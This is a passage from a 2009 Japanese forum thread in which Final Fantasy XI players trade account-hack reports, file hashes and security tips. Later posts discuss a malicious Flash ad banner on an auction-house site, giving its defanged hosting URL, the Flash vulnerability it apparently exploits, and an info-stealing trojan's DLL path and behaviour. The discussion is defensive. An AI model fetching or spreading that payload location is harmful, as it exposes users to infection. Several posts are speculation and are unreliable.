奇特な新規がたとえいたとしても、
初めてきたtellが業者からなんてオンゲ初心者じゃなくてもがっかりしそう。
808既にその名前は使われています:2009/08/20(木) 20:19:58 ID:KKZMpAgd
>>807
サーバーとか関係全くないぞ?w
国内でBOTPCが100万台近くあるのにw踏み台ありすぎだろ、jk
809568:2009/08/20(木) 21:25:28 ID:1E8ONH1K
>>694
とても詳しく説明をありがとうございました。
できそうな気がしたのでMD5やってみようと思ったのですが、
pol.exeが見つかりません。
こんなんでよくツール入れたなと思いました。ゴメンナサイ。
810既にその名前は使われています:2009/08/20(木) 21:26:56 ID:w6kUMCHO
>>809
C:\Program Files\PlayOnline\SQUARE\PlayOnlineViewer\pol.exe
811既にその名前は使われています:2009/08/20(木) 21:29:24 ID:TTje2sqK
一分半で即答わろた
812568:2009/08/20(木) 21:43:11 ID:1E8ONH1K
>>810
即答ありがとうございます。
そこにないんです・・・
813既にその名前は使われています:2009/08/20(木) 21:45:56 ID:TLSt4eHi
POLのショートカットを作ってるなら、そこのプロパティを見てみよう
814既にその名前は使われています:2009/08/20(木) 21:46:28 ID:MQS/Mk2C
CじゃなくDにあるとか?
815既にその名前は使われています:2009/08/20(木) 21:47:05 ID:m0MWXXFh
>>812
POL立ち上げる時のアイコン右クリック→プロパティ→ショートカット
816既にその名前は使われています:2009/08/20(木) 21:47:22 ID:m0MWXXFh
くそ被ったwwwwwwww結婚してくれwwwwwwww
817既にその名前は使われています:2009/08/20(木) 21:48:38 ID:X0vttbP2
一気にネタ臭くなったな
818既にその名前は使われています:2009/08/20(木) 21:51:34 ID:RXLUGZDc
windowerはwindowerのアイコン叩くとpol起動じゃなかったっけか?

スタート>検索でpol.exe 捜すとか?
819568:2009/08/20(木) 21:58:18 ID:1E8ONH1K
昨日カスペルスキーの隔離されたファイルを
ぴこぴこいじったのでそのとき削除したのかなとか・・・

ショートカットのリンク先にもないです
820既にその名前は使われています:2009/08/20(木) 22:04:17 ID:KZ6/XOIV
>>674でアドレス自分でかいてるじゃん
隔離だと思われる
821既にその名前は使われています:2009/08/20(木) 22:06:23 ID:jGumIamG
ためしにMD5なるもの試してみたら

ファイルサイズ:1600000ジャスト

計算後:564d8a1a3d91d373b5d9e6271fb9a0aa

上のほうに上がってるのとファイルサイズ違うのはなぜ?(´・ω・`)
822既にその名前は使われています:2009/08/20(木) 22:08:09 ID:KZ6/XOIV
>>821
File: pol.exe
CRC-32: 5ccf5221
MD4: c4f1e17da73df27174548692586a2b0e
MD5: 564d8a1a3d91d373b5d9e6271fb9a0aa
SHA-1: c5719c86a664a34f6bb5e12c7f522db63cbb06f2
823既にその名前は使われています:2009/08/20(木) 22:12:16 ID:zgJ0ig2L
          ____
       / \  /\ キリッ
.     / (ー)  (ー)\    トークンがあれば安心してFF11ライフを送ることができます。
    /   ⌒(__人__)⌒ \
    |      |r┬-|    |
     \     `ー'´   /


         ___
       /::::::::::::::::\
      /::::::─三三─\
    /:::::::: ( ○)三(○)\ 
    |::::::::::::::::::::(__人__)::::  |
     \:::::::::   |r┬-|   ,/
    ノ::::::::::::  `ー'´   \
824既にその名前は使われています:2009/08/20(木) 22:38:04 ID:jGumIamG
>>822
サンクス!
ファイルサイズは勘違いでしたw
825568:2009/08/20(木) 23:12:18 ID:1E8ONH1K
隔離されたはずのpol.exeは見つかりませんでした。
昨日は全くつながらなかったadobeサイトにはつながるようになりました。
826既にその名前は使われています:2009/08/20(木) 23:14:35 ID:KKZMpAgd
どっちにしろクリリンだしうpする意味ない罠
827既にその名前は使われています:2009/08/20(木) 23:27:42 ID:Fhqn3vXW
デスクトップなどのショートカットのリンク先は
C:\Program Files\PlayOnline\SQUAREENIX\FINAL FANTASY XI\Tools\polboot.exe

探しているPOL.exeは
C:\Program Files\PlayOnline\SQUAREENIX\PlayOnlineViewer\POL.exe(もしくは
C:\Program Files\PlayOnline\SQUARE\PlayOnlineViewer\POL.exe

社名がスクエア組\SQUARE\→スクエニ組\SQUAREENIX\に変わったタイミングで
フォルダが異なってるんじゃない?って違うか

828既にその名前は使われています:2009/08/20(木) 23:53:03 ID:TLSt4eHi
カスペルスキーでpol.exeをキーロガーとして誤?検出した時に、検疫か削除しちゃったんじゃないのかね?
polのショートカットから起動だけしてみて、起動するなら違うだろうけどさ

起動しないなら、どんな操作をしたか思い出してみて。
検疫なら復元方法があるだろうけど、カスペルスキーでの復元方法はしらないな
829既にその名前は使われています:2009/08/21(金) 00:28:33 ID:qzu90CAj
寝る前h汚臭
830既にその名前は使われています:2009/08/21(金) 01:28:08 ID:OTTh7C2e
なんかもうスゲーいらいらするな。
蹴り倒したい。
831既にその名前は使われています:2009/08/21(金) 01:33:59 ID:ZW04fULA
ハッシュすら張れないようなのが引っかかるってことは確かなようだ
832既にその名前は使われています:2009/08/21(金) 02:02:00 ID:KsenVEV2
POL.exeもわからないのにツールつかってる、ってある意味スゴイよなぁ

なぜ公式を使わずwindowerなのか、そこらの理由は聞きたいところ……
833既にその名前は使われています:2009/08/21(金) 02:25:50 ID:d1WXvD0c
Winの検索機能も使えない、コンポライアンスもない、未だにIE6、ツールでアドバンテージ^^v

そりゃハックされるっていうw
834既にその名前は使われています:2009/08/21(金) 03:14:45 ID:IOdDeI0y
●気付いた日時:【8/20 18:00頃】
●不審なアドレスのクリックの有無:【ニコニコかpixiv巡回くらい】
●他人が貴方のIDを使用したことが一度でもあるか:【Yes】
●ID・Passの認証方法:【ワンタイムパストークン無  2年前くらいから手打ち】
●Pass変更の履歴:【した ファックされたパスは一年前くらいに変更したもの】
●他人が貴方のPCを使う可能性の有無:【No】
●ツールの使用の有無:【No】
●ネットカフェの利用の有無:【No】
●使っているOS:【Vista SP1】
●使用ブラウザ:【IE8 ver8.0.6001.18813】
●WindowsUpdateの有無:【毎日3:00自動】
●FlashPlayerとRealPlayerのバージョン:【 FlashPlayer:19日21:00頃最新に RealPlayer:不明】
●アンチウイルスソフト状況:【avast】
●その他のセキュリティ対策:【FWはノーマル その他は無し】
●ウイルススキャン結果:【カスペルスキーオンラインスキャンでとく無し avastでも特に無し】
●スレログやテンプレを読んだか:【Yes】
●hosts変更:【無】
●PeerGuardian2の導入:【無】
●その他情報・症状など:【スレであがってたような症状無し】 
835既にその名前は使われています:2009/08/21(金) 03:22:55 ID:D4bfV+eb
3人目の犠牲者現る!ハッシュハッシュ!!
836既にその名前は使われています:2009/08/21(金) 03:24:33 ID:IOdDeI0y
821が拙者でゴザル
837既にその名前は使われています:2009/08/21(金) 03:24:34 ID:qBtIv+3e
トークン無しのFlashは半月脆弱性有で放置だろ?
838既にその名前は使われています:2009/08/21(金) 03:27:24 ID:D4bfV+eb
何だ、トークン無いのか・・・(´・ω・`)
839既にその名前は使われています:2009/08/21(金) 03:32:58 ID:qBtIv+3e
なんか、そんな環境じゃヤられて当然って風に思うのが
当たり前になってる自分が・・・逆に悔しい・・・悪いのは業者なのに・・・

PCは只の道具なのに道具に振り回されてるのってさ・・・
840既にその名前は使われています:2009/08/21(金) 04:11:26 ID:PvNfpvqV
>●FlashPlayerとRealPlayerのバージョン:【 FlashPlayer:19日21:00頃最新に RealPlayer:不明】

毎度のことだけどバージョン聞いてんのに最新w と言われてましても
841既にその名前は使われています:2009/08/21(金) 04:40:53 ID:vsvrLSQp
PG2が頻繁に 61.111.58.105(韓国) のアクセス遮断してるから、俺もついにやられたかと思って
色々調べたら、ノートンのアップデートプログラム(LUCOMS~1.EXE)がアクセスしてた模様。

PG2でブロックしたままでも別のサーバーにアクセスしてるぽくてアップデートには問題なし。
842既にその名前は使われています:2009/08/21(金) 04:47:49 ID:oUSlNyE5
昨日の夜もあったけど今日もNIS2009のLiveUpdateが失敗するな
843既にその名前は使われています:2009/08/21(金) 05:32:23 ID:s/51QOxN
>>841-842
俺も深夜にLiveUpdateで、韓国に繋ぎたがる先生にびびりまくって適当に調べてみたら、
MMOBBSのROの垢ハック対策室に、カスペで似たような事例があった事ぐらいしかわからんかった・・・
PG2が韓国で弾くけど、aguseで引けないから気持ちがわるうございます
844既にその名前は使われています:2009/08/21(金) 07:22:04 ID:YG+MsPl3
ハッシュ…
845既にその名前は使われています:2009/08/21(金) 07:42:45 ID:ftfznasu
adobeのサイトにやっと繋がるようになった、あの繋がらなかった数時間はなんだったのか気になるなー
846既にその名前は使われています:2009/08/21(金) 07:53:56 ID:AaJvywSf
>>804
スクエニに生体データなんぞ預けたら
和田が辞任する直前辺りに業者に売り渡されるだろ
847既にその名前は使われています:2009/08/21(金) 08:53:39 ID:YG+MsPl3
地震だー
848既にその名前は使われています:2009/08/21(金) 10:28:26 ID:NaOlAmE5
最近の半島ゲー
前回と違うIPで接続した場合メール承認や2NDパスが必要に
なったものが多い
ワンタイム突破もできたようだし
またFFに戻ってくるのかも

気をつけてくれよな
849既にその名前は使われています:2009/08/21(金) 10:33:27 ID:wHHutDTi
>>828
カスペルスキーで削除してしまったんだと思います。
FFが起動しないので・・・
大事なところで大失敗;;もう一回ハックされてきます。

>>832
イニシャルエッグが宅配できたら、たぶんツールはつかってなかったと思います。

いろいろ調べてもらったのにすみませんでした。
なんかネタみたいになってごめんなさい。
850既にその名前は使われています:2009/08/21(金) 11:10:36 ID:R2Mnp3MW
でもまぁ、ちょうど良い機会だからOSから入れ直してクリーンにしときなよ。
しかし、新手法がでてきたかもしれないならやっぱ専用PCにするのが一番安全か。
851既にその名前は使われています:2009/08/21(金) 12:30:52 ID:qzu90CAj
画像劣化のPS2版か意図せず徒労に終わる恐れのあるXboX360版もあるッすよ。
852既にその名前は使われています:2009/08/21(金) 13:24:44 ID:K7ZdBmvi
>>841-843
HTTPヘッダでざっと見た感じ、61.111.58.5〜61.111.58.155あたりは韓国にあるAkamaiのサーバ。
Akamaiは大規模コンテンツ配信を行なう企業で、世界各地に大量のサーバと高速回線を持っている。
Akamaiのサーバに接続する際にはDNSベースで負荷分散が行なわれる。

MSやAdobe、Symantecはakamaiと契約していて、一部のコンテンツ配信を委託している。
たとえば、>>686>>690あたりで出ているAdobeのwwwimages.adobe.comのほか、
MSのdownload.windowsupdate.com、Symantecのliveupdate.symantec.comなどがAkamaiのサーバ。
というわけで、61.111.58.5〜61.111.58.155への接続はあまり心配しなくていいと思う。

あと、mabinogi板の垢ハックスレではカスペルスキーのavp.exeがこのレンジ内のサーバに
接続要求を出しているという報告が上がっている。カスペルスキーがAkamaiサーバを使っているかは
知らないけど、avp.exeって透過プロクシ的に動作するWebやメールのマルウェアチェッカらしいから、
Webブラウザなどに代わって外部につなぎに行くのはおかしくないはず。
853既にその名前は使われています:2009/08/21(金) 14:08:44 ID:K7ZdBmvi
>>852>>843
あ、mabinogi板じゃなくてMMOBBSのROのアカウントハック対策・セキュリティ 総合スレが元か。
間違えた−。
854既にその名前は使われています:2009/08/21(金) 15:11:38 ID:qzu90CAj
中尉寒気age
855既にその名前は使われています:2009/08/21(金) 16:18:45 ID:hKjrVtkR
結局原因究明ならずか
大流行してないんだから特定の原因があるんだろうけどなー
856既にその名前は使われています:2009/08/21(金) 16:55:12 ID:d1WXvD0c
特定の原因:ハックされている人間が情報弱者過ぎる
857既にその名前は使われています:2009/08/21(金) 17:12:02 ID:3stT3vgk
FF11AHを見たけど、うちのFirefoxさんが変なものを落としてくる気配がない。
PCの環境:Firefox+カスペル+pg2+spybot
このPCでFFはやってない。
まあソースを見てすぐウィルスが分かるようなレベルの訳がないか。
858既にその名前は使われています:2009/08/21(金) 17:17:28 ID:hKjrVtkR
AH自体じゃなくてランダムで表示される広告のうちどれか一つが罠になってるんだと思うよ
特定するまで根気よく調べてやる気にもならんが
859既にその名前は使われています:2009/08/21(金) 17:57:35 ID:TWK7HxGN
そもそもAHじゃなくて罠ツールかもしれんしなw
860既にその名前は使われています:2009/08/21(金) 18:07:57 ID:BTvq4tES
Firefox使ってる奴は
Noscriptいれてるのがほぼデフォなんだから広告なんてなんでもこいなんだがな。
あまりにブロックしすぎて鯖選択のスクリプト自体もデフォ設定じゃ作動しないんだからw
Spybotなんて入れてる余裕あるならNoscriptいれろっつーのw
861既にその名前は使われています:2009/08/21(金) 18:13:43 ID:qzu90CAj
ハチロクマルさんは危険な臭い・・・触れない方が良いかも?
862既にその名前は使われています:2009/08/21(金) 19:28:59 ID:uKG0cndN
>>849
>イニシャルエッグが宅配できたら、たぶんツールはつかってなかったと思います。
そんなの使ってもいい理由にならない、揃えるのなんてツール使わなくても出来るし実際揃えた
正当化しようとしてもむだてこと
863既にその名前は使われています:2009/08/21(金) 19:35:28 ID:oHRvx6IF
Kujata RMT宣伝tell担当

サンド港
Diktjflhcfvhlvl

7時間ほど放置されてるね。最悪。
864既にその名前は使われています:2009/08/21(金) 19:37:49 ID:NDCtQjx1
うおお、ログインしようとしたらIDかパスが違うって言われた・・・ハックされちゃったのかな
865既にその名前は使われています:2009/08/21(金) 19:41:13 ID:ZW04fULA
丸裸にされてからでも遅くない
866既にその名前は使われています:2009/08/21(金) 19:42:29 ID:9Ln2Zbhq
>>864
たぶんだけどIDかパスが違う
867既にその名前は使われています:2009/08/21(金) 19:45:58 ID:NDCtQjx1
>>866
昨日まで普通にできてたんだよ、さっきログインしようと思ってびっくりした

とりあえずまとめサイトとか色々みてみます
868既にその名前は使われています:2009/08/21(金) 19:46:24 ID:vOvCThFW
>>864
俺もそんな状況でハックされた。>>568のケースとも似ている。
もう少しこのスレ読んでから報告させてもらいます。
なんか盆休みとか週末をピンポイントで狙ってる気がするなぁ・・・
869既にその名前は使われています:2009/08/21(金) 19:49:26 ID:s/51QOxN
>>852
ありがとう。なんかちょっとモヤモヤがなくなったw
でも気持ちが悪いから韓国弾くのは継続するぜ
870既にその名前は使われています:2009/08/21(金) 20:27:43 ID:vOvCThFW
●気付いた日時 8/21の17時頃から進行中の模様(アイテム消えてるの確認後再ログイン、アカ停止しようと試みるもキャラ選択で強制終了)
●不審なアドレスのクリックの有無 有?(先週末AHでAntVirが反応した)
●他人が貴方のIDを使用したことが一度でもあるか 無
●ID・Passの認証方法 トークン有、スレ内にも似た報告あったが、AHに反応したあたりからログアウト時必ずエラーが出てた
●Pass変更の履歴 無
●他人が貴方のPCを使う可能性の有無 無
●ツールの使用の有無 無
●ネットカフェの利用の有無 無
●使っているOS Windows XP Home Edition
●使用ブラウザ IE6
●WindowsUpdateの有無 今月は更新
●FlashPlayerとRealPlayerのバージョン 記憶に無い程無視してた
●アンチウイルスソフト状況 AntiVir
●その他のセキュリティ対策 FWが例外だった
●ウイルススキャン結果 検出無し
●スレログやテンプレを読んだか 読んだ
●hosts変更 わからない
●PeerGuardian2の導入 無
871既にその名前は使われています:2009/08/21(金) 20:28:56 ID:ZW04fULA
よーしハッシュってみようか!
872既にその名前は使われています:2009/08/21(金) 20:37:49 ID:vOvCThFW
今思えば、正常にログアウトできなかったり戦闘中強制終了が起こる等ここ数日不振な点満載でした
それでも被害無かったもので放置していたのもまずかったと思います

今日の状況は、キャラ選択>強制終了>ログインすらできない>数分後ログインしてみるとアイテム消失
こんな感じでした。ぬるすぎて申し訳ないが何かの参考になれば
873既にその名前は使われています:2009/08/21(金) 20:43:38 ID:ZW04fULA
おわりかy
874既にその名前は使われています:2009/08/21(金) 20:44:01 ID:d1WXvD0c
●使っているOS Windows XP Home Edition
●使用ブラウザ IE6

またかyp1w
875既にその名前は使われています:2009/08/21(金) 20:44:24 ID:vOvCThFW
追記 スレ内にあったcccsというのは試しましたが異常無しでした
トークン買ってゲーム内荒らされて個人情報晒して・・・たまらんです
876既にその名前は使われています:2009/08/21(金) 20:46:05 ID:ZW04fULA
もっと突っ込んで調査してくれりゃ神なんだけどなー
臭いプロセスとかないの?
877既にその名前は使われています:2009/08/21(金) 20:46:13 ID:KsenVEV2
>>870
XPの被害が多いなぁ……

再インストするまえに、pol.exe書き換えされてるかどうか、確認できました??
878既にその名前は使われています:2009/08/21(金) 20:54:41 ID:hKjrVtkR
>>875
とりあえず出てきたMD5のハッシュ値をここに書いてくれ
879既にその名前は使われています:2009/08/21(金) 21:08:33 ID:vOvCThFW
MD5の数値は>>694さんの数値と同じでした
pol.exe書き換えに関しては全く確認していませんが、
AHで反応後なんとなく変だなと感じた時期にコンピュータの自動更新が2回程あったような
その時にって可能性もあるんですかね?

pol.exeのプロパティに利用してない時間が最終利用時間として表示されてるし
とりあえず、アンインストールしてみました
880既にその名前は使われています:2009/08/21(金) 21:12:49 ID:ZW04fULA
antivir反応してどう処置したの?
881既にその名前は使われています:2009/08/21(金) 21:14:51 ID:7QOzWbJc
>>877
XPのアップグレードはSP2まで強制?
SP3まで強制パッチ?
882既にその名前は使われています:2009/08/21(金) 21:22:08 ID:vOvCThFW
>>880
どーせいつもの誤作動だろと踏んでOK連打した自分が情けない
ちなみに発見の窓が2つ開いてましたね

それにしても、仮に某サイトが原因だとしたら被害やばそうなんでが
883既にその名前は使われています:2009/08/21(金) 21:23:59 ID:hKjrVtkR
トークンの安心感もあるのかもしれんが
未だにIEの使用率高すぎるな・・・
884既にその名前は使われています:2009/08/21(金) 21:29:50 ID:DmRLwW2H
いくらセキュリティソフト入れても最終的なところが人間の判断だからって好例か
885既にその名前は使われています:2009/08/21(金) 21:39:00 ID:ZW04fULA
ん〜
ポップアップをそのままOKなら

Access deny
問題があるファイルにアクセスしません。

これだよねえ
何で感染したんだろう
886既にその名前は使われています:2009/08/21(金) 21:58:08 ID:vBzMxoZU
疑問なんだが、キャラ選択で強制終了って事はログインは出来てるんだよな?
なら、相手側はもう手出しが出来ない状態だと思うんだが
まだ進行中って、相手はログインしてアイテム取ってるって事?
887既にその名前は使われています:2009/08/21(金) 22:17:48 ID:vOvCThFW
>>886
キャラ選択と同時に強制終了>>ログインできない(ここでハックだと確信)>>10~20分程で入れるも自キャラ宅配前
>>ログアウトするもやはり正常に終わらない>>垢停止しようと再度ログイン(先週からメンバー選択飛ばせなくなった)
>>すんなり進むもキャラ選択でまた強制終了>>うんざりしてアンインストール

流れとしてはこんな感じです。ログイン時とログアウト時の挙動が明らかに変だったのが印象的ですねぇ。
今後の処置等何かアドバイスがあればよろしくお願いします。
888既にその名前は使われています:2009/08/21(金) 22:23:37 ID:V/9CSuZc
>>887
お前、ネタだろ
キャラ選択画面まで行ってるなら、相手は弾き出されてるだろう
POLの内部ロジックまで改造した偽POLが出回ってるとか言い出しそうだな
889既にその名前は使われています:2009/08/21(金) 22:31:17 ID:vOvCThFW
>>888
いやいや、本当ですよ。ただその時に自キャラが動いてるわけではないかもしれないけど。
>>583で指摘されてるように横取りの前兆である可能性は高いと思います。
890既にその名前は使われています:2009/08/21(金) 22:31:42 ID:nUMtgdXD
なんか最近、トークン突破したからトークン無意味だ!って
触れ回ってるシナ業者いないか?w
891既にその名前は使われています:2009/08/21(金) 22:42:41 ID:EFMhtDAG
どこにそんなレスがw
892既にその名前は使われています:2009/08/21(金) 22:53:15 ID:2dEKXss5
「パス変更により元ユーザーのログインを不可能にしてじっくりいただく」というのが、
OTP導入によりパス変更ができなくなったので
「入力されたID/パス/OTPを傍受、クライアントをいじって(?)ログインを阻害している間にいただく」
って感じになったってとこなのかぬ

いずれにせよパス変更までいたらんしサバ移動もされなくなる、
万が一被害にあってもアカ復元は無制限、
業者側にとっては(今のところの被害報告からみて)OTP引っこ抜いたごく短期間に勝負しなきゃならない、
ってな感じだからトークン利用のアドバンテージは依然として明らかなんだけど

現時点での前兆症状は
・クライアントに異常が起こる(ログアウトが正常に出来ない、戦闘中強制終了が起こる)
くらい?

pol.exeそのものに改ざんがないんだとすると
またぞろsystem32あたりのdllかなんかに紛れ込んでるんだろうか
893既にその名前は使われています:2009/08/21(金) 23:26:07 ID:jXv1q62Q
          ____
        /_ノ  ヽ、_\
 ミ ミ ミ  o゚((●)) ((●))゚o      ミ ミ ミ    <今週だけでRMT相場150円さがったお
/⌒)⌒)⌒. ::::::⌒(__人__)⌒:::\   /⌒)⌒)⌒)     馬鹿ばかりでハックうまうまだお
| / / /      |r┬-|    | (⌒)/ / / //  
| :::::::::::(⌒)    | |  |   /  ゝ  :::::::::::/
|     ノ     | |  |   \  /  )  /  
ヽ    /      `ー'´      ヽ /    /     
 |    |   l||l 从人 l||l      l||l 从人 l||l   バ   
 ヽ    -一''''''"〜〜``'ー--、   -一'''''''ー-、 ン
  ヽ ____(⌒)(⌒)⌒) )  (⌒_(⌒)⌒)⌒)) バ
                             ン
894既にその名前は使われています:2009/08/21(金) 23:50:29 ID:qzu90CAj
蛇鯖 Dddmidってのが多分垢ハック被害者のアイテムバザってる。
895既にその名前は使われています:2009/08/22(土) 00:23:34 ID:AxhQDWjq
IE6も危険ではあるけどWindowsUpdateしてれば大丈夫なはずよ

ここ近日でハックされた人の共通点は FlashPlayerを更新してないって事
そりゃ先月中旬から既に脆弱性突くコードが出回ってて、ゼロデイ攻撃状態で
早くAdobe対応しろと言われ続けて、ようやく30日に対応したぐらい後手後手
だったのに、そこの穴をふさいでなかったら、もう、ハックしてくださいウエルカ〜ム
って言ってるようなものじゃん・・・

まあ、一般の人には基本30日に1回しかアップデートチェックしてくれないFlashPlayerが
悪いんだけどさ・・・
896既にその名前は使われています:2009/08/22(土) 00:37:11 ID:AxhQDWjq
これだけじゃあれなので FlashPlayerを毎回or1日1回VerUPを自動確認する方法

メモ帳を開いて以下の記述を「mms.cfg」という名前で保存(※英文字の部分の2行のみ)
・Flashコンテンツを開いた時、毎回チェックする場合
AutoUpdateDisable=0
AutoUpdateInterval=0

・1日1回チェックする場合
AutoUpdateDisable=0
AutoUpdateInterval=1

これを自分のパソコンの C:\WINDOWS\System32\Macromed\Flash フォルダにコピーして再起動

これだけで、ニコニコだとか、Flash広告だとかを見たときにVerUP可能ならダイアログが
出るようになりますよ。
参照 ttp://itpro.nikkeibp.co.jp/article/COLUMN/20090309/326137/?ST=security&P=3
897既にその名前は使われています:2009/08/22(土) 00:40:45 ID:xltktHHo
途端にネタ臭くなったな。もういいや
898既にその名前は使われています:2009/08/22(土) 00:51:42 ID:AxhQDWjq
>896 あー・・・ファイル名「mms.cfg」ってのは
mms.cfg であって
mms.cfg.txt じゃないのでご注意を・・・って、PCの事わからない人にはこれでも難しいか・・・

それにしてもPCの事が解らない人のPCだと、XPだったら基本自動更新でXP3のIE8になってる
はずなのに、なんでIE6の人多いのかなぁ・・・わ ざ と IE6のままって事だよね?
899既にその名前は使われています:2009/08/22(土) 01:09:28 ID:4BE6D2ru
>>858
常に罠張ってりゃネットパトや■からも警戒されるし
■も解っていながらAH放置してる言い逃れ出来ないから
サイト訪問時にランダムで罠起動させてる可能性も高いかと

AHに張ってるフラッシュ広告に罠があるなら同系統の
フラッシュ広告を張ってるサイトも罠になってるはず
つか有名広告多いし他でも被害は絶対でてないとおかしい
AHだけに集中してるってのはサイトの有名度もあるだろうが
AHのサイト自体に罠を仕掛けている可能性もあると思う

あと接続IPでJPだと罠発動!って仕掛けもありそうな
NAだと煩いのが多いからJP対象にしてるかもしれん
つか疑いだすとキリがないなぁ・・・
900既にその名前は使われています:2009/08/22(土) 01:26:56 ID:7cVsVuKx
すいませんたった今他の端末からアクセスされて落ちてもどってきたんだけど
POLパスワードとスクエニアカウントのパスワード変更で大丈夫?

●8/22 1時頃
●不審なアドレスのクリックの有無 不明
●他人が貴方のIDを使用したことが一度でもあるか(No)
●ID・Passの認証方法:(ワンタイムパストークン有り、未使用の場合、POLに保存の場合セキュリティ設定使用かどうか/自動ログイン
●Pass変更の履歴(した/22日1時)
●他人が貴方のPCを使う可能性の有無(No)
●ツールの使用の有無:(Yes/Windower FFXIStyle)
●ネットカフェの利用の有無:(No)
●使っているOS:(XP SP3)
●使用ブラウザ:(FireFox3.1 つい昨日3.5.2から下げた)
●WindowsUpdateの有:(最終更新日、等)
●FlashPlayerとRealPlayerのバージョン:(多分最新)
●アンチウイルスソフト状況:(ウィルスバスター2009)
●その他のセキュリティ対策:(Spybot S&D)
●スレログやテンプレを読んだか:(今から読みます)
●hosts変更:(わからない )
●PeerGuardian2の導入:(無)
901既にその名前は使われています:2009/08/22(土) 01:32:23 ID:OsYuMhO8
ツール告白すれば許されるみたいな勘違い馬鹿がいるみたいだから 協力しない
902既にその名前は使われています:2009/08/22(土) 01:37:24 ID:w9OOYR3Z
FFXIAHサイトの広告バナーにマルウェアが仕込まれていた/いる件。

すでにdat落ちした↓のスレで ttp://loan-5● sakura●ne●jp/css/1.swf に
ノートンが反応したと書かれていた。

FFXIAHにスパイウェア!
http://dubai.2ch.net/test/read.cgi/ogame/1250468452/

それを読んで拾ってきた 1.swf をVirusTotalでスキャンしてもらった結果。
ttp://www.virustotal.com/jp/analisis/6c8eed0c182d94139fc3271f8813d715ad00b32071c45ee938f954fa2c4e7d75-1250872119
8/39と、現在でも検出率は高くない。

実際に動作を確認したわけではなけど、Flash Playerの脆弱性を突いて
マルウェア本体をダウンロード&実行させるものだと推測。

McAfeeの検出名にある「CVE2009-1862」の脆弱性を悪用しているとすると、
7/30に公開されたFlash Player 10.0.32.18/9.0.246.0より古いバージョンはアウト。

これがダウンロード&実行するものだとすれば、ウイルス対策ソフトが
マルウェア本体をブロックしてくれればそれでも防げるけど未検証。
903既にその名前は使われています:2009/08/22(土) 01:58:02 ID:HvaBN04x
>>902
それは誤検知の可能性が高い。
自分でも拾ってas見てみたけど、
何かを拾って実行するようなものではなかった。
904既にその名前は使われています:2009/08/22(土) 02:00:37 ID:HvaBN04x
>FlashPlayerとRealPlayerのバージョン:(多分最新)
これは笑うところか…。

ちなみに先日RealPlayerSP(ver12)が出ているから
利用者は更新を(もちろんアンインスコしちゃうのも手だけど)。
905既にその名前は使われています:2009/08/22(土) 02:09:49 ID:HvaBN04x
あと、ツールとか変なソフトを最近入れた人は気をつけましょうw

開発環境「Delphi」狙うウイルス、作成したソフトをウイルス化
ttp://internet.watch.impress.co.jp/docs/news/20090821_310087.html
これに感染した環境で、このライブラリを含むプログラムを作成すると、
そのプログラムまでもが“汚染”され、ウイルス化することになる。
こうして“ウイルス化”したプログラムの報告を、
トレンドマイクロでは多数受けているとしており、
「その一部はオンラインソフトとして正規に配布されているものであることも特定している」という。
906既にその名前は使われています:2009/08/22(土) 02:12:04 ID:mXadZ9rl
>>900みたいにトークン使ってログインして遊んでて
不自然なフリーズまたは他端末からの接続で落とされた時点ではまだ抜かれてないんでしょ
そのあと慌てて繋ぎなおそうとしてワンタイムパス送信した段階で食われる
907既にその名前は使われています:2009/08/22(土) 02:14:02 ID:mXadZ9rl
あとパス変更しても>>900のPCはそれをいそいそと支那畜に送信するから変更するだけ無駄
908既にその名前は使われています:2009/08/22(土) 02:19:07 ID:dFEzpted
ま、ツール使用者乙
この機会にオフゲに戻って二度とネトゲやるなよ
909既にその名前は使われています:2009/08/22(土) 02:25:53 ID:NraOP+xW
どう読んだらそういう結論になるんだよ
910既にその名前は使われています:2009/08/22(土) 02:30:49 ID:dFEzpted
>900
●ツールの使用の有無:(Yes/Windower FFXIStyle)
911既にその名前は使われています:2009/08/22(土) 02:34:12 ID:NraOP+xW
アホ乙
912既にその名前は使われています:2009/08/22(土) 02:44:10 ID:ef6G49Bi
「ツーラー氏ね」よりは優しいじゃないか
913既にその名前は使われています:2009/08/22(土) 02:56:22 ID:w9OOYR3Z
>>900
ワンタイムパスを使っているならスクエニは回数に制限無く救済してくれるので
まずは落ち着いて。

スクエニアカウント&ワンタイムパスを使っていても、POL IDとPOLパスワードを
盗まれて、スクエニアカウント&ワンタイムパスを使わずにログインを試みられると
「現在ログイン中のプレイオンラインIDで他の端末からもログインされたため
オフラインに切り替わりました」というメッセージが表示されて強制ログアウトされる
仕様だったはず。この場合、落とされるけど敵はログインはできない。

ここの所情報が錯綜していてアレなんだけど、POL IDとPOLパスワードは盗まれて
いる可能性が高い。FFをプレイしているそのPCは安全とは言えないから、より安全
だといえるPCがあればそちらでPOLパスワードとスクエニパスワードを変更したほうが
いいと思う。
--

>>903
なるほど。デコンパイルやActionScriptのチェックは全然してませんですた。
今さっき、穴あきFlash Player 10.0.22.87を入れたIE8とFx 3.5.2にSWFを食わせて
みたけど、どちらもブラウザが落ちるものの、怪しげなパケットは飛んでいない模様。
914既にその名前は使われています:2009/08/22(土) 03:53:48 ID:pDs0pqxe
AHの話はかなり昔から言われてて、今更被害が急に増える、って考えにくいけど……

今報告があがってる人たちってなんか最近パス抜かれた、ってより
過去にデータ収集されてて今アクセスされてるだけ、てことの方がありそうな気がする 
POLパスを一定期間で変更とかしててもログインされちゃったのかな??
915既にその名前は使われています:2009/08/22(土) 04:10:16 ID:7cVsVuKx
>>913
ありがとうございました
このPCは再度OS入れなおして
公式窓化で余生を過ごそうと思います 
ハックされたらそれで引退でちょうどいいかと

POLIDは2ヶ月くらい前に変更したきりだったと思います

ツールはアドバンテージっていうから堂々と使ってたらこれだよ!
916既にその名前は使われています:2009/08/22(土) 04:12:02 ID:4KxG97Wj
上に出てるのは誤検じゃないぽいぞ
影響あるソフト:Adobe Acrobat version 9.1.2 Adobe Reader version 9.1.2 
Adobe Flash Player version 9.0.159.0 Adobe Flash Player version 10.0.22.87

ダウンロードされるトロイの木馬今回拡散された脆弱性のあるPDFファイルとSWFファイルは、
脆弱性のあるAdobe Acrobat ReaderとFlash Playerによって実行されると次のトロイの木馬に自動的に感染される
Dropper/InfoStealer.143360-Win-Trojan/InfoStealer.98304


917既にその名前は使われています:2009/08/22(土) 04:17:18 ID:4KxG97Wj
脆弱性のあるFlashファイルによってDropper/InfoStealer.143360 がダウンロードされ実行された場合、Windowsフォルダに次のファイルが生成される

C:\Windows \ime\wmimachine2.dll (98,304 Byte)

■悪意的機能
OS、サービスパックバージョン ・使用している国・言語情報の取得 
・ハードウェア情報、MACアドレス、DHCP及びゲートウェイ情報の取得?コンピューター名、HDDパーティション情報、フォルダー情報の取得
